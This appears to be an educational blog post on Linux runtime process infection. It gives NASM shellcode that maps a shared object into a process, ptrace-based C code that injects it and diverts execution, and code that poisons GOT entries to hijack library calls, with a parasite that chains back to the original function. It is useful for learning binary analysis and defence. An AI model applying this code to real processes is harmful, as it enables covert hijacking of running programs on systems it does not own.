Runtime Process Infection via PLT/GOT Redirection

Background

If you don't care about how I ended up going down this rabbit hole, feel free to skip this entire section and start at the Parasite Loader section.

This is my first attempt at writing a technical piece, so please take that into consideration when reading through this document. To give you some insight into how I started learning about UNIX viruses, reverse engineering, and the enormous number of other mind-bamboozling things that come along the way, I thought I'd share a little story with you. I think it's rather interesting how I've gone from knowing nothing about Linux infection techniques to having a basic understanding of this particular topic, along with some of the interrelated topics that come with learning about Linux viruses and binary analysis.

Towards the end of 2017 my colleague (@steve2) and I were discussing stuff at work, as you normally do. The topic of "breaking into things" arose, and by "things" we were literally referring to compromising systems and how attackers use their strategies and techniques to essentially "steal credentials" and "own shit". Honestly speaking, I've never exploited a system or network, and even if I had, I wouldn't necessarily confess it on here. Anyway, my colleague, who has an extensive amount of knowledge on computer security, asked me a very simple question along the lines of "How would you go about changing a shell environment variable that has been initialized as READONLY?". I replied "I don't know, but let me think about it and I'll get back to you". As an enthusiastic security engineer, I went away and started brainstorming all the different ways I could achieve this. On the train commute home, I could only think about using a debugger and somehow attaching myself to the shell process and altering the memory contents, or invoking a function that would unset the environment variable that I specified. But how? I didn't know how to use a debugger effectively, nor could I comprehend what a disassembled binary even looks like, or how the Linux kernel loads the different program segments into memory. At that point I came to terms with the fact that it was going to be a steep learning curve and that I still had a lot to learn. I didn't end up solving the problem that same evening. The following day my colleague asked "Did you manage to solve that little exercise we spoke about yesterday?". I simply responded with "No", feeling rather embarrassed.

The conversation then spiralled off into something completely random, eventually returning with another question along the lines of "Have you ever heard of ptrace?". Again, I responded with "Eh, no", and at this point I really felt embarrassed, because I felt as though I should already know about all these wonderful "utilities" and how to use them effectively. He responded with something along the lines of "Dude, literally go and read the man page for the ptrace system call". I replied "Sure, no worries" and entered `man ptrace` into one of my shells. All it took was for me to read the very first sentence, which is along the lines of "The ptrace() system call provides a means by which one process (the "tracer") may observe and control the execution of another process (the "tracee"), and examine and change the tracee's memory and registers.". At this point, my mind was literally stuck in an endless loop where each iteration was a new idea on how I could use this system call to do some really "interesting" things. One of the first things that came to mind was how on earth I could subvert the SSH daemon into doing something that it was never designed to do.

Parasite Loader

The assembly code provided below, once assembled and linked, is what we commonly refer to as "shellcode". Shellcode is typically a sequence of self-contained machine instructions that must be ready to take control of the processor regardless of the current processor state. The term "shellcode" does not necessarily mean that the purpose of the instructions is to spawn a shell per se; rather, it has become a more generic term for a segment of position-independent code that can be executed directly by the CPU.

When shellcode is injected into a running process, it takes over like a biological virus inside a body, and this is exactly what the assembly code below has been designed to do, but in the context of computer programs. The primary objective of the shellcode is to map a shared object file into the process that executes it. The technique relies on two system calls, open() and mmap(), to load the shared object file into memory. Although this is a simple, clean, and effective means of loading your parasite code into a program image, it does have its drawbacks. The problem is that most shared libraries you'd want to load require relocations in order to execute correctly, so for a shared library to work with this simple method its code must be written to be completely position-independent. In some of my upcoming posts I'm looking to explore how to use wrapper functions such as __libc_dlopen_mode() and __libc_dlsym(), made available within GLIBC, so that the dynamic linker can be invoked from the program and perform all the relocations itself.
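
For readers more comfortable with C than assembly, here is a rough sketch of the same two calls. The function name map_object() is my own and purely illustrative; the flags and the 0x2000 length mirror the values the shellcode loads into its registers. Unlike the shellcode, this version checks for errors and closes the file descriptor.

```c
#include <fcntl.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * C rendering of the open() + mmap() pair issued by the shellcode.
 * Returns the address of the mapping, or MAP_FAILED if either call fails.
 * map_object() is a hypothetical name used only for this illustration.
 */
void *
map_object(const char *path, size_t length)
{
    void *base;
    int fd;

    fd = open(path, O_RDONLY);
    if (fd == -1)
        return MAP_FAILED;

    /* Same arguments the shellcode places in rdi, rsi, rdx, r10, r8, r9. */
    base = mmap(NULL, length, PROT_READ | PROT_WRITE | PROT_EXEC,
            MAP_PRIVATE, fd, 0);

    /* The mapping remains valid after the descriptor is closed. */
    close(fd);

    return base;
}
```

Calling map_object("/lib/library.so.1.0", 0x2000) would correspond to what the shellcode does inside the infected process. Note that the file is mapped raw: no relocations are applied, which is exactly the limitation described above.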

I've detailed the path of execution for the parasite loader below and have provided the assembler code and disassemblies for reference.

Use the short relative JMP instruction to transfer control to the instruction referenced by the label 'do_call'.
```
jmp short do_call
```
Branch to the procedure location referenced by the 'jmp_back' label. The CALL instruction pushes its return address, that is, the address of whatever immediately follows the CALL, onto the stack. Here that address is not an instruction at all but the string constant holding the absolute path of the file to be mapped into the program image's address space.
```
call jmp_back
library: db "/lib/library.so.1.0", 00
```
Prepare the registers with the values required for the sys_open system call and pass control to the kernel by issuing the 'syscall' instruction. The use of the POP instruction here is to obtain the offset address of the string constant.
```
pop rdi
xor rsi, rsi
xor rax, rax
mov al, 0x2
syscall
```

Prepare the registers with the values required for the sys_mmap system call and again pass control to the kernel by issuing the 'syscall' instruction.

```
xor rdi, rdi
xor rsi, rsi
mov si, 0x2000
xor rdx, rdx
mov dl, 0x7
xor r10, r10
mov r10b, 0x2
xor r8, r8
mov r8b, al
xor r9, r9
xor rax, rax
mov al, 0x9
syscall
```

Finish with an 'int3' instruction so that the process in which the shellcode is executing receives a SIGTRAP signal. The tracee stops and the attached tracer is notified, which allows it to take back control and restore execution.
```
int3
```

The complete assembly source code for the parasite loader is provided below.

    ; Assembly code that invokes the Linux sys_open and sys_mmap system calls in
    ; order to inject the shared object into a process's address space.
    ;
    ; Author: Matthew Bobrowski
    ; Build:
    ;     nasm -f elf64 parasite.asm
    ;     ld -o parasite parasite.o
    section .text
        ; The _start symbol must be declared for the linker program (ld)
        global _start
    _start:
        ; Small nop-sled used as a safe-guard when diverting execution
        nop
        nop
        nop
        nop
        jmp short do_call
    jmp_back:
        ; Prepare arguments for the sys_open system call
        ; - rdi: pointer to string
        ; - rsi: file access mode (O_RDONLY)
        ; - rax: system call number (sys_open)
        pop rdi
        xor rsi, rsi
        xor rax, rax
        mov al, 0x2

        ; Execute the sys_open system call
        syscall

        ; Prepare arguments for the sys_mmap system call
        ; - rdi: starting address of mapped file (NULL, allow kernel to choose)
        ; - rsi: length of bytes starting at offset (8192 bytes)
        ; - rdx: protection of mapping (PROT_EXEC | PROT_READ | PROT_WRITE)
        ; - r10: mapped memory visibility (MAP_PRIVATE)
        ; - r8:  file descriptor returned by sys_open
        ; - r9:  starting offset (0)
        ; - rax: sys_mmap
        xor rdi, rdi
        xor rsi, rsi
        mov si, 0x2000
        xor rdx, rdx
        mov dl, 0x7
        xor r10, r10
        mov r10b, 0x2
        xor r8, r8
        mov r8b, al
        xor r9, r9
        xor rax, rax
        mov al, 0x9

        ; Execute the sys_mmap system call
        syscall

        ; Signal (SIGTRAP) a breakpoint to the debugger to restore execution
        int3
    do_call:
        call jmp_back
        library: db "/lib/library.so.1.0", 00

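Below is the disassembly of the assembled source code above. Note that this particular listing has no nop sled at '_start', so it appears to come from a build without the four nop instructions; the remaining instructions are identical.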

    parasite:     file format elf64-x86-64

    Disassembly of section .text:

    0000000000400080 <_start>:
    400080:   eb 31                   jmp    4000b3 <do_call>

    0000000000400082 <jmp_back>:
    400082:   5f                      pop    rdi
    400083:   48 31 f6                xor    rsi,rsi
    400086:   48 31 c0                xor    rax,rax
    400089:   b0 02                   mov    al,0x2
    40008b:   0f 05                   syscall
    40008d:   48 31 ff                xor    rdi,rdi
    400090:   48 31 f6                xor    rsi,rsi
    400093:   66 be 00 20             mov    si,0x2000
    400097:   48 31 d2                xor    rdx,rdx
    40009a:   b2 07                   mov    dl,0x7
    40009c:   4d 31 d2                xor    r10,r10
    40009f:   41 b2 02                mov    r10b,0x2
    4000a2:   4d 31 c0                xor    r8,r8
    4000a5:   41 88 c0                mov    r8b,al
    4000a8:   4d 31 c9                xor    r9,r9
    4000ab:   48 31 c0                xor    rax,rax
    4000ae:   b0 09                   mov    al,0x9
    4000b0:   0f 05                   syscall
    4000b2:   cc                      int3

    00000000004000b3 <do_call>:
    4000b3:   e8 ca ff ff ff          call   400082 <jmp_back>

    00000000004000b8 <library>:
    4000b8:   2f                      (bad)
    4000b9:   6c                      ins    BYTE PTR es:[rdi],dx
    4000ba:   69 62 2f 6c 69 62 72    imul   esp,DWORD PTR [rdx+0x2f],0x7262696c
    4000c1:   61                      (bad)
    4000c2:   72 79                   jb     40013d
    4000c4:   2e 73 6f                cs jae 400136
    4000c7:   2e 31 2e                xor    DWORD PTR cs:[rsi],ebp
    4000ca:   30 00                   xor    BYTE PTR [rax],al
    ^         ^                       ^
    Address   Opcode / Instruction    Assembly
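
The loader in the next section refers to a `shellcode` array that isn't listed in this post. As a sketch, assuming the array is simply the assembled bytes of the source listing (including the four nops, which the disassembly above lacks), it might look like the following. The jmp and call displacements are relative, so they are the same with or without the sled.

```c
/*
 * Assumed contents of the shellcode array: the opcode bytes from the
 * disassembly, prefixed with the four-byte nop sled from the source.
 */
unsigned char shellcode[] = {
    0x90, 0x90, 0x90, 0x90,             /* nop sled                */
    0xeb, 0x31,                         /* jmp short do_call       */
    0x5f,                               /* pop rdi                 */
    0x48, 0x31, 0xf6,                   /* xor rsi, rsi            */
    0x48, 0x31, 0xc0,                   /* xor rax, rax            */
    0xb0, 0x02,                         /* mov al, 0x2 (sys_open)  */
    0x0f, 0x05,                         /* syscall                 */
    0x48, 0x31, 0xff,                   /* xor rdi, rdi            */
    0x48, 0x31, 0xf6,                   /* xor rsi, rsi            */
    0x66, 0xbe, 0x00, 0x20,             /* mov si, 0x2000          */
    0x48, 0x31, 0xd2,                   /* xor rdx, rdx            */
    0xb2, 0x07,                         /* mov dl, 0x7             */
    0x4d, 0x31, 0xd2,                   /* xor r10, r10            */
    0x41, 0xb2, 0x02,                   /* mov r10b, 0x2           */
    0x4d, 0x31, 0xc0,                   /* xor r8, r8              */
    0x41, 0x88, 0xc0,                   /* mov r8b, al             */
    0x4d, 0x31, 0xc9,                   /* xor r9, r9              */
    0x48, 0x31, 0xc0,                   /* xor rax, rax            */
    0xb0, 0x09,                         /* mov al, 0x9 (sys_mmap)  */
    0x0f, 0x05,                         /* syscall                 */
    0xcc,                               /* int3                    */
    0xe8, 0xca, 0xff, 0xff, 0xff,       /* call jmp_back           */
    '/', 'l', 'i', 'b', '/', 'l', 'i', 'b', 'r', 'a', 'r', 'y',
    '.', 's', 'o', '.', '1', '.', '0', 0x00
};
```

The array is 80 bytes long, which fits comfortably inside the 128 bytes of original text that the loader saves and later restores.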

Execution Diversion

This section explores how to inject the shellcode and divert the execution of the running process to code that we control. The code injection and execution diversion techniques discussed here are achieved by using the ptrace system call made available on Unix and Unix-like operating systems. In essence, ptrace is a versatile and rather complex interface that allows one process to control the execution of another and to peek and poke at its innards. I'll only be covering a subset of the ptrace requests within this document, so if you're curious to see what else the ptrace system call is capable of and how it pertains to working with process images, I'd highly encourage you to read through the ptrace man page.

Before the shellcode can run and have the process load the shared object file into its address space, we need to inject the loader into the process image. The stack may potentially work for this purpose, however some systems enforce protection mechanisms that mark the stack portion of the process's virtual address space non-executable, so that attack code injected onto the stack cannot be executed. In Linux kernels that are not patched with PaX, the default behaviour for ptrace is to permit the tracer to write to memory segments that have been mapped as non-writable. Seeing as the Linux kernel that I'm currently working on hasn't had the PaX patches applied, it's convenient to use the text segment and overwrite its first sizeof(shellcode) bytes with our shellcode, starting at the base address 0x400000. This is the default base address of the text segment for a non-PIE ELF executable built for x86_64 platforms; a position-independent executable is loaded at a randomized base instead.
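
The code in this post hardcodes 0x400000. If you'd rather not rely on that, one alternative (not what I use below) is to read the base from /proc/<pid>/maps. The sketch below assumes the first mapping listed belongs to the main executable, which is usually but not always the case; text_base() is a name I've made up for the example.

```c
#include <stdio.h>
#include <sys/types.h>

/*
 * Return the start address of the first mapping listed in
 * /proc/<pid>/maps, or 0 on failure. Assumes (without checking) that
 * the first mapping is the main executable.
 */
unsigned long
text_base(pid_t pid)
{
    char path[64];
    unsigned long start = 0;
    FILE *maps;

    snprintf(path, sizeof(path), "/proc/%d/maps", (int) pid);

    maps = fopen(path, "r");
    if (maps == NULL)
        return 0;

    /* Each line begins "start-end perms ..."; only start is needed. */
    if (fscanf(maps, "%lx-", &start) != 1)
        start = 0;

    fclose(maps);
    return start;
}
```

A more careful version would compare the pathname column against the target of /proc/<pid>/exe before trusting the address.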

Upon attaching to the process via PTRACE_ATTACH, the following steps need to be performed:

1. Call PTRACE_PEEKTEXT, passing in the base address 0x400000 and a pointer to a buffer, so that the original code can be saved prior to injecting the parasite loader shellcode.
2. Call PTRACE_POKETEXT, passing in the base address 0x400000 and a pointer to the parasite loader shellcode, so that it can be copied to the tracee's text segment.
3. Call PTRACE_GETREGS to obtain the current set of registers and save them to a structure of type user_regs_struct so that they can be restored at a later point.
4. Set the rip register to 0x400000 + sizeof(syscall instruction), that is, the base address plus 2. If the tracee was stopped inside a system call, the kernel may rewind rip by those two bytes in order to restart the call; the nop sled at the start of the shellcode makes either landing point safe.
5. Call PTRACE_SETREGS, passing in the updated registers structure.
6. Call PTRACE_CONT in order to continue the execution of the tracee process, and call wait() to watch for SIGTRAP signals from the tracee process.
   - If the tracee stops with anything other than SIGTRAP, continue executing; otherwise proceed with restoring the tracee process.
7. Call PTRACE_POKETEXT, passing in the base address and a pointer to the buffer containing the original code, so that we can replace our injected code with the original program code.
8. Call PTRACE_SETREGS, passing in the saved user_regs_struct with the original register values, so that execution can be restored.
9. Call PTRACE_DETACH in order to restart the stopped process. At this stage you've successfully diverted and reverted execution.

The source code below is the implementation of the above diversion and restoration procedure.

    static long
    loader(pid_t pid)
    {
        long base;
        int status;
        long buffer[16];
        unsigned char *p;
        unsigned char text[128];
        unsigned long offset = 0x400000;
        struct user_regs_struct registers;

        unsigned long rip;
        unsigned long rax;
        unsigned long rdx;
        unsigned long rsi;
        unsigned long rdi;
        unsigned long r8;
        unsigned long r9;
        unsigned long r10;

        ptrace_peektext(pid, offset, buffer, 128);

        p = (unsigned char *) buffer;
        memcpy(text, p, 128);

        ptrace_poketext(pid, offset, (long *) shellcode, sizeof(shellcode));

        if (ptrace(PTRACE_GETREGS, pid, NULL, &registers) == -1) {
            perror("ptrace(PTRACE_GETREGS)");
            exit(EXIT_FAILURE);
        }

        rip = registers.rip;
        rax = registers.rax;
        rdx = registers.rdx;
        rsi = registers.rsi;
        rdi = registers.rdi;
        r8 = registers.r8;
        r9 = registers.r9;
        r10 = registers.r10;

        registers.rip = offset + 2;

        if (ptrace(PTRACE_SETREGS, pid, NULL, &registers) == -1) {
            perror("ptrace(PTRACE_SETREGS)");
            exit(EXIT_FAILURE);
        }

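        /*
         * Resume the tracee until the int3 at the end of the shellcode
         * raises SIGTRAP. A stop caused by any other signal is simply
         * resumed again (the signal is suppressed for simplicity).
         */
        for (;;) {
            if (ptrace(PTRACE_CONT, pid, NULL, NULL) == -1) {
                perror("ptrace(PTRACE_CONT)");
                exit(EXIT_FAILURE);
            }

            if (waitpid(pid, &status, 0) == -1 || !WIFSTOPPED(status)) {
                fprintf(stderr, "tracee did not stop as expected\n");
                exit(EXIT_FAILURE);
            }

            if (WSTOPSIG(status) == SIGTRAP)
                break;
        }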

        if (ptrace(PTRACE_GETREGS, pid, NULL, &registers) == -1) {
            perror("ptrace(PTRACE_GETREGS)");
            exit(EXIT_FAILURE);
        }

        ptrace_poketext(pid, offset, (long *) text, 128);

        base = registers.rax;

        registers.rip = rip;
        registers.rax = rax;
        registers.rdx = rdx;
        registers.rsi = rsi;
        registers.rdi = rdi;
        registers.r8 = r8;
        registers.r9 = r9;
        registers.r10 = r10;

        if (ptrace(PTRACE_SETREGS, pid, NULL, &registers) == -1) {
            perror("ptrace(PTRACE_SETREGS)");
            exit(EXIT_FAILURE);
        }

        return base;
    }

Poisoning the GOT

This section provides the details on how the shared library functions referenced within the program's text segment can be hijacked. The GOT (Global Offset Table) is a section that resides within the data segment of the program image. It is a table predominantly comprised of function pointers to shared library functions that have been resolved by the dynamic linker. Typically the GOT is writable, which makes it both attractive and practical for an attacker to overwrite a GOT entry with the address of their own code. Once the GOT entry has been modified, the next time the shared library function is called within the program, control flow is redirected to something other than the original shared library function. You may be wondering whether there are mitigation techniques available to harden the data sections within a process image. There certainly are, and one such technique is RELRO (relocation read-only). I'm not going to cover it within this document, however I encourage you to read about it, as it is certainly interesting and something to be aware of.
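
If the idea is new to you, a toy model may help. The sketch below has nothing to do with ptrace or a real GOT: it just uses an ordinary function pointer as a stand-in for a GOT slot, overwrites it, and has the replacement hand control back to the saved original. All of the names are invented for the illustration.

```c
#include <stddef.h>
#include <string.h>

typedef size_t (*length_fn)(const char *);

/* Stand-in for a GOT slot that holds a resolved library function. */
static length_fn got_slot = strlen;

/* Where the hook keeps the pointer it displaced. */
static length_fn saved_original;

/* The "parasite": does something extra, then calls the original. */
size_t
hooked_length(const char *s)
{
    return saved_original(s) + 1000;
}

/* The program only ever calls through the slot, like a PLT stub would. */
size_t
call_via_slot(const char *s)
{
    return got_slot(s);
}

/* Save the current pointer, then redirect the slot to the hook. */
void
poison_slot(void)
{
    saved_original = got_slot;
    got_slot = hooked_length;
}
```

Before poison_slot() runs, call_via_slot("abc") goes straight to strlen(); afterwards the same call site lands in hooked_length() without the caller having changed at all. The rest of this section does the same thing to another process's real GOT.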

Firstly, in order to patch the GOT entry with the address of our code, we need to determine the name of the shared library function we would like to hijack and find the address of its GOT entry. If we look at the structure of a relocation entry, we can see that it provides two useful fields labelled 'r_offset' and 'r_info'. For the PLT relocations we're interested in, 'r_offset' holds the virtual memory address at which the dynamic linker applies the relocation, which is the address of the GOT entry itself, and 'r_info' provides a means of obtaining the associated symbol from the symbol table via the helper macro ELF64_R_SYM(i), defined as ((i) >> 32). The function below iterates through each of the relocation entries found in the table referenced by DT_JMPREL. For each relocation entry, the associated symbol is obtained from DT_SYMTAB using the 'r_info' field and its name is checked against the shared library function name passed in as an argument. If there is a match, the 'r_offset' value is returned to the caller.

    static Elf64_Addr
    relocation_offset(pid_t pid, const char *name, Elf64_Addr address)
    {
        int i, count;
        Elf64_Addr base;
        Elf64_Addr relocs;
        Elf64_Addr symtab;
        Elf64_Addr strtab;
        Elf64_Xword size;
        Elf64_Dyn *dyn;
        Elf64_Rela *rela;
        Elf64_Ehdr *e_hdr;
        Elf64_Phdr *p_hdr;

        base = address;
        dyn = malloc(sizeof(Elf64_Dyn));
        rela = malloc(sizeof(Elf64_Rela));
        e_hdr = malloc(sizeof(Elf64_Ehdr));
        p_hdr = malloc(sizeof(Elf64_Phdr));

        ptrace_peektext(pid, base, e_hdr, sizeof(Elf64_Ehdr));

        base += e_hdr->e_phoff;

        do {
            ptrace_peektext(pid, base, p_hdr, sizeof(Elf64_Phdr));
            base += sizeof(Elf64_Phdr);
        } while (p_hdr->p_type != PT_DYNAMIC);

        base = p_hdr->p_vaddr;

        do {
            ptrace_peektext(pid, base, dyn, sizeof(Elf64_Dyn));

            switch (dyn->d_tag) {
                case DT_SYMTAB:
                    symtab = dyn->d_un.d_ptr;
                    break;
                case DT_STRTAB:
                    strtab = dyn->d_un.d_ptr;
                    break;
                case DT_PLTRELSZ:
                    size = dyn->d_un.d_val;
                    break;
                case DT_JMPREL:
                    relocs = dyn->d_un.d_ptr;
                    break;
                default:
                    break;
            }

            base += sizeof(Elf64_Dyn);
        } while (dyn->d_tag != DT_NULL);

        i = 0;
        count = size / sizeof(Elf64_Rela);

        do {
            int index;
            char buff[40];
            Elf64_Sym symbol;

            ptrace_peektext(pid, relocs, rela, sizeof(Elf64_Rela));

            index = ELF64_R_SYM(rela->r_info);
            ptrace_peektext(pid, (symtab + (index * sizeof(Elf64_Sym))),
                    &symbol, sizeof(Elf64_Sym));

            ptrace_peektext(pid, strtab + symbol.st_name, buff,
                    sizeof(buff));
            /* Guarantee termination in case the name fills the buffer. */
            buff[sizeof(buff) - 1] = '\0';

            if (strcmp(name, buff) == 0) {
                return rela->r_offset;
            }

            i++;
            relocs += sizeof(Elf64_Rela);
        } while (i < count);

        return 0;
    }
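
The r_info decoding used inside relocation_offset() can be tried in isolation. The two helpers below are hypothetical names of my own; the macros and the R_X86_64_JUMP_SLOT constant come from <elf.h>. On x86_64 the symbol index lives in the upper 32 bits of r_info and the relocation type in the lower 32 bits.

```c
#include <elf.h>

/* Index into the dynamic symbol table for this relocation entry. */
unsigned long
reloc_symbol_index(const Elf64_Rela *rela)
{
    return ELF64_R_SYM(rela->r_info);
}

/*
 * Non-zero if the entry is a PLT jump slot, i.e. it describes the GOT
 * entry of a function called through the PLT.
 */
int
reloc_is_jump_slot(const Elf64_Rela *rela)
{
    return ELF64_R_TYPE(rela->r_info) == R_X86_64_JUMP_SLOT;
}
```

The entries reached through DT_JMPREL should all be jump slots, so relocation_offset() doesn't need the second check, but it is a cheap sanity test if you adapt the code to walk other relocation tables.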

Once relocation_offset() returns the address of the GOT entry, the entry for this shared library call can be patched accordingly. We can simply use ptrace(PTRACE_POKETEXT, ...) to perform this update, i.e.

    ptrace_poketext(pid, reloc, &patch, sizeof(Elf64_Addr));

Patching Transfer Code

Prior to updating the GOT entry, it is imperative that the function pointer currently stored at that location is saved for later use. In most cases the value found there before the overwrite is the address of the real function as resolved by the dynamic linker. With lazy binding, however, an entry whose function has not yet been called still points back into its PLT stub, and the first call through that stub lets the dynamic linker rewrite the entry, which would undo the patch.

Once control has been passed to the arbitrary function, we need to implement a mechanism that will allow us to pass execution back to the original shared library function. The malicious code has been designed to include a function pointer stub, which is intended to be replaced with the address of the original function.

    static long
    evil()
    {
        char value[10];

        value[0] = 'I';
        value[1] = 'n';
        value[2] = 'f';
        value[3] = 'e';
        value[4] = 'c';
        value[5] = 't';
        value[6] = 'e';
        value[7] = 'd';
        value[8] = '\0';

        /* Placeholder address; patched at runtime with the original function. */
        long (*original)(char *buffer) = (long (*)(char *)) 0x7fffffffffff;
        return original(value);
    }

Locate the sequence of bytes that are to be patched by looking at the function disassembly.

    library.so.1.0:     file format elf64-x86-64


    Disassembly of section .text:

    0000000000000211 <evil>:
     211:   55                      push   rbp
     212:   48 89 e5                mov    rbp,rsp
     215:   48 83 ec 20             sub    rsp,0x20
     219:   c6 45 e0 49             mov    BYTE PTR [rbp-0x20],0x49
     21d:   c6 45 e1 6e             mov    BYTE PTR [rbp-0x1f],0x6e
     221:   c6 45 e2 66             mov    BYTE PTR [rbp-0x1e],0x66
     225:   c6 45 e3 65             mov    BYTE PTR [rbp-0x1d],0x65
     229:   c6 45 e4 63             mov    BYTE PTR [rbp-0x1c],0x63
     22d:   c6 45 e5 74             mov    BYTE PTR [rbp-0x1b],0x74
     231:   c6 45 e6 65             mov    BYTE PTR [rbp-0x1a],0x65
     235:   c6 45 e7 64             mov    BYTE PTR [rbp-0x19],0x64
     239:   c6 45 e8 00             mov    BYTE PTR [rbp-0x18],0x0
     23d:   48 b8 ff ff ff ff ff    movabs rax,0x7fffffffffff
     244:   7f 00 00
     247:   48 89 45 f8             mov    QWORD PTR [rbp-0x8],rax
     24b:   48 8d 55 e0             lea    rdx,[rbp-0x20]
     24f:   48 8b 45 f8             mov    rax,QWORD PTR [rbp-0x8]
     253:   48 89 d7                mov    rdi,rdx
     256:   ff d0                   call   rax
     258:   c9                      leave
     259:   c3                      ret

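In the disassembly above, the placeholder is the 8-byte immediate operand of the movabs instruction at offset 0x23d. It is located by searching for the byte sequence "\xe8\x00\x48\xb8": the last two bytes of the preceding mov instruction followed by the two-byte movabs opcode. In the code below, once the signature is found at (offset + i), the 8 bytes that follow it at (offset + i) + 4 are overwritten with the original function address using ptrace(PTRACE_POKETEXT, ...).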

    static int
    patch_function(pid_t pid, Elf64_Addr offset, Elf64_Addr address)
    {
        int i, len;
        uint8_t buff[80];
        uint8_t transfer[] = "\xe8\x00\x48\xb8";

        ptrace_peektext(pid, offset, buff, sizeof(buff));

        /* Stop early enough that buff[i + 3] stays inside the buffer. */
        for (i = 0, len = sizeof(buff); i + 3 < len; i++) {
            if (buff[i] == transfer[0] && buff[i + 1] == transfer[1] &&
                buff[i + 2] == transfer[2] && buff[i + 3] == transfer[3]) {
                ptrace_poketext(pid, (offset + i) + 4, &address,
                        sizeof(Elf64_Addr));
                return 0;
            }
        }

        return -1;
    }
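
The signature scan in patch_function() can also be exercised offline, without a tracee, against bytes copied from the disassembly. The helper below is a generic sketch with a name of my own choosing; it uses memcmp() and never reads past the end of the buffer.

```c
#include <stddef.h>
#include <string.h>

/*
 * Return the offset of the first occurrence of sig within buf, or -1
 * if it does not occur. find_signature() is an illustrative name.
 */
long
find_signature(const unsigned char *buf, size_t len,
        const unsigned char *sig, size_t sig_len)
{
    size_t i;

    if (sig_len == 0 || sig_len > len)
        return -1;

    /* i + sig_len <= len keeps every comparison inside the buffer. */
    for (i = 0; i + sig_len <= len; i++) {
        if (memcmp(buf + i, sig, sig_len) == 0)
            return (long) i;
    }

    return -1;
}
```

Fed the bytes starting at offset 0x239 of the listing (c6 45 e8 00 48 b8 ...), it reports the signature at index 2, so the placeholder to patch begins 4 bytes later at index 6.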

Now that there is a means of diverting execution through a hijacked shared library function and passing execution back, we can safely detach from the tracee process and allow it to continue.

    ptrace(PTRACE_DETACH, pid, NULL, NULL);

I'd like to thank both @elfmaster and @silviocesare for the phenomenal work they've done in the Linux virus space.